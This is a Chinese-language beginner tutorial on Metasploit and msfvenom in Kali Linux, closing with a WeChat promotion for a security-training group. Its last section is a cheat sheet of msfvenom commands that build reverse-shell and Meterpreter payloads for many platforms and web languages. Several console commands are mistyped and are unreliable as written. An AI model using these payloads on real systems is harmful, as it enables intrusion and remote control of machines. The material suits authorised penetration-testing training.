1、 msf的基础介绍
kali是默认集成了mepasploit framework,简称为msf,不同的框架下,它有不同的模块,不同的模块之间,互相交流彼此生产输入输出的数据,第一个模块生成的数据可以给第二个或者第三个模块去直接拿来使用,原因是它拿来使用的是后台有数据库,其它的版本后面也有数据库,比如说我们扫描的目标系统,扫描下来的信息,比如说开放了哪些端口,哪些信息,都会存到数据库里面,而measploit framework用的是postgresql数据库来进行存储。
早期的msf版本需要先启动数据库再启动msf
2)msf的基本机构
3)、msf的基础操作和命令
在这里的话,我们打开kali的终端,输入msfconsole打开msf的界面,因为kali系统是自带的msf工具,执行命令之后,它这里会进行一个初始化,接着就可以看见msf的命令行界面
4)msf中专业术语,因为在msf中,这些都是常见的专业术语,也是必要的
– Exploit,攻击工具/代码
– Payload,攻击载荷
– Shellcode
– Module,模块
– Listener,监听器
5)、常用命令
showpayloads (show 可以理解为显示的意思), 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具,然后就可以看见显示出相对应的辅助工具
Use exploist/windows/iis/cve_2017_7269 进入相对应的模块,比如说我进入了cve_2017_7269漏洞模块,接着就可以看见它这里进入了
show options – 查看该模块所有可用选项,比如说我们进入cve_2017_7269漏洞模块,执行攻击的话,需要配置该模块的一些选项
show payloads – 查看该模块适用的所有载荷代码,然后就可以显示出相对应的payload
show targets – 查看该模块适用的攻击目标类型
search ssh - 根据关键字搜索某模块,比如说我搜索ssh相对应的漏洞模块,就可以看见显示出相对应的ssh关键词的模块
info – 显示某模块的详细信息
bach –退出当前进行的模块
6)msfvenom (攻击载荷生成和编码器)
主要参数:
-p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
使用msfvenom -l 可以查看可以利用payload
msfvenom -l | grep windows | grep x64 | grep tcp 选择payload
7)、在Linux命令下,执行msf命令生成可执行的文件,这些文件用来反弹shell用于提权,各种可执行的脚本命令如下。
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '' > shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Python:
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
最后喜欢我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和优惠券)
就会自动分享给你微信号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。
还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券